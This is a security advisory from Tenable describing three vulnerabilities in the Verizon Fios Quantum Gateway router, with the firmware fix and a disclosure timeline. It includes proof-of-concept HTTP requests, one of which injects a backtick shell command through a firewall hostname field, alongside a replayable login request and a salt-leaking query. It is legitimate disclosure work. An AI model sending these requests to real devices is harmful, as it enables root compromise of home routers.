Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Verizon Fios Quantum Gateway Multiple Vulnerabilities

High

Synopsis

Tenable has discovered multiple vulnerabilities in the Verizon Fios Quantum Gateway.

CVE-2019-3914: Authenticated Command Injection

A command injection vulnerability was discovered in the API backend. This vulnerability can be exploited remotely to achieve command execution with root privileges. An attacker must be authenticated to the device's administrative web application in order to perform the command injection.

This issue exists due to the way firewall access control rules are processed. Specifically, the vulnerability can be triggered by adding an access control rule for a network object with a crafted host name.

For example, if a network object is added with a hostname of "`whoami`" (note the backticks), and this object is used in a firewall access control rule, the 'whoami' command will be executed.

Below is a log entry in /chroot/mnt/log/user. Notice that `whoami` is incorporated into the iptables command.

user.err bhr4: Firewall.AccessControlRulesLog: Failed to delete rules: iptables -A AC_B_1_NWOBJ_1 -s `whoami` -j AC_B_1_SERVICES

Below is a proof of concept HTTP request. Note that the results of the command will not be returned. Please note that it is possible to obtain a root shell.

POST /api/firewall/accesscontrol HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.11.1
X-XSRF-TOKEN: 1eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89
Cookie: Session=944817705; XSRF-TOKEN=1eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89
Content-Length: 373
Content-Type: application/json
 
{"blockRule": true, "schedule": "", "networkObjects": [{"rules": [{"hostname": "`whoami`", "networkObjType": 4}], "type": 3, "name": "Scooby"}], "enabled": true, "hosts": [], "schedule1": {}, "services": []}

CVE-2019-3915: Login Replay

The login process is susceptible to replay. Given that HTTP is not enforced, an attacker could intercept a login request and subsequently replay it to gain access to the router's administrative web interface.

When a user attempts to log in, a salted SHA-512 password hash is POSTed. This is all the attacker needs to log in. For instance, a login request looks like such:

POST /api/login HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/
Content-Type: application/json;charset=utf-8
Content-Length: 143
Connection: close
Cookie: test
 
{"password":"5e619e19824b1072f89ff309e3896b1b6dd31aebfab1698b2662d97352d9da9fbdbf7c165239a2214bdf9ae512821e78875a1b515bd4140ec919dda201f1001e"}

CVE-2019-3916: Password Salt Information Disclosure

An unauthenticated attacker is able to retrieve the value of the password salt by simply visiting a URL in a web browser. Given that the firmware does not enforce the use of HTTPS, it is feasible for an attacker to capture (sniff) a login request. The login request contains a salted password hash (SHA-512), so the attacker could then perform an offline dictionary attack to recover the original password.

A proof of concept is below showing an HTTP request/response pair. Notice that the 'passwordSalt' is returned.

GET /api HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: test; bhr4UI2HasToRefresh=false; bhr4HasEnteredAdvanced=true; Session=; XSRF-TOKEN=

HTTP/1.1 401 Unauthorized
Cache-Control: no-cache
Content-Type: application/json; charset=utf-8
Content-Length: 173
Date: Thu, 06 Dec 2018 13:00:40 GMT
Server: lighttpd/1.4.38
 
{"doSetupWizard":false,"requirePassword":true,"passwordSalt":"6299bfce-1d56-4a6c-9bd8-352dc9ce865c","isWireless":false,"error":1,"maxUsers":10,"denyState":0,"denyTimeout":0}

Solution

Upgrade to firmware version 02.02.00.13.

Disclosure Timeline

12/11/2018 - Disclosed to vendor. 90-day date is 03/12/2019.
12/12/2018 - Verizon Incident Response Team replies saying that the Python attachment was blocked. Tenable is asked to follow up with our point of contact.
12/12/2018 - Tenable replies, stating that we do not have a point of contact. We ask that our message is routed to the proper person.
12/14/2018 - No response was received from Verizon. Tenable follows up to determine the proper way of communicating.
12/14/2018 - Tenable receives an automated reply, assigning a reference number of 2018121418229.
12/14/2018 - Tenable receives a human response, indicating that we may send our disclosure and PoC. The 90-day date is moved to 3/14/2019 as a professional courtesy.
12/14/2018 - Tenable resends the disclosure and PoC.
12/14/2018 - Tenable receives an automated reply, assigning a reference number of 2018121418773.
12/14/2018 - Verizon contacts Tenable to ask for PoC.
12/14/2018 - Tenable resends the PoC again.
12/14/2018 - Verizon acknowledges they have received the PoC.
12/14/2018 - Verizon indicates that the command injection has been validated. They have opened a ticket with their vendor to address the issue, and they will send a follow-up email once a fix is confirmed.
12/17/2018 - Tenable asks if the other two bugs have been validated.
12/19/2018 - Verizon responds that the other two bugs will be "officially" handled by another group. In an unofficial capacity, these bugs were previously identified and on the roadmap to be remediated. The RCE was new, though.
12/19/2018 - Verizon responds again: "Verizon has examined the data provided and we are actively working with our engineering teams and vendor to evaluate and, as appropriate, address the reported vulnerabilities in a timely manner."
12/19/2018 - Tenable asks Verizon to keep us in the loop with any updates.
01/04/2019 - Tenable asks for an update.
01/04/2019 - Vecirt says they are still testing and validating the report. They will "take appropriate actions, including making required updates in a timely manner, if needed."
01/04/2019 - Tenable reaches out to another contact, hoping to gain more insight.
01/22/2019 - Tenable follows up: reminds Verizon of 90 date, asks for an update, and asks for preferred direct contact.
01/23/2019 - Tenable informs Verizon that CVE-2019-3914 through CVE-2019-3916 will be assigned for the discovered vulnerabilities.
01/23/2019 - Verizon responds. They are "still testing and will take appropriate actions, including making required updates in a timely manner, if needed." They will "have a response for the public report before the March 14, 2019 date."
01/24/2019 - Tenable asks if Verizon has a particular date in mind.
01/29/2019 - Verizon does "not have a specific anticipated date of completion." Nevertheless, they "certainly plan to continue providing updates to you as our validation and testing efforts progress, and are completed."
02/13/2019 - Tenable asks Verizon for an update.
02/19/2019 - Verizon says the bugs will be fixed in firmware version 2.2, and it will be deployed in the near future.
02/19/2019 - Tenable asks when version 2.2 will be deployed.
03/01/2019 - Verizon pushes firmware version 02.02.00.13.
03/01/2019 - Tenable notifies Verizon of intent to publish a research advisory prior to 3/14. Asks if Verizon plans to issue an advisory.
03/01/2019 - Verizon notifies Tenable that firmware updates are pushed in small batches, and the process won't be complete until March 13. Tenable is asked to delay an advisory until March 14th.
03/01/2019 - Tenable acknowledges the request and asks if Verizon plans to issue a security advisory.
03/04/2019 - Tenable agrees to wait until the 14th. Asks again whether Verizon will issue a security advisory.
03/05/2019 - Verizon says they will not issue an advisory. They will notify Tenable when the firmware update is fully deployed.
03/13/2019 - Verizon notifies Tenable that firmware updates have been fully deployed.
04/05/2019 - Verizon informs Tenable that a small percentage of their customers still need to be patched against these vulnerabilities.
04/09/2019 - Tenable releases the research advisory.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now

Try Tenable.io

FREE FOR 30 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now.

Buy Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

$2,275

Buy Now

Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, email, community and chat support 24 hours a day, 365 days a year. Full details here.

Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 30 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 30 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Learn More about Industrial Security

Get a Demo of Tenable.sc

Please fill out the form below with your contact information and a sales representative will contact you shortly to schedule a demo. You may also include a short comment (limited to 255 characters). Please note that fields with asterisks (*) are mandatory.

Try for Free Contact Sales

Try Tenable Lumin

FREE FOR 30 DAYS

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Buy Tenable Lumin

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.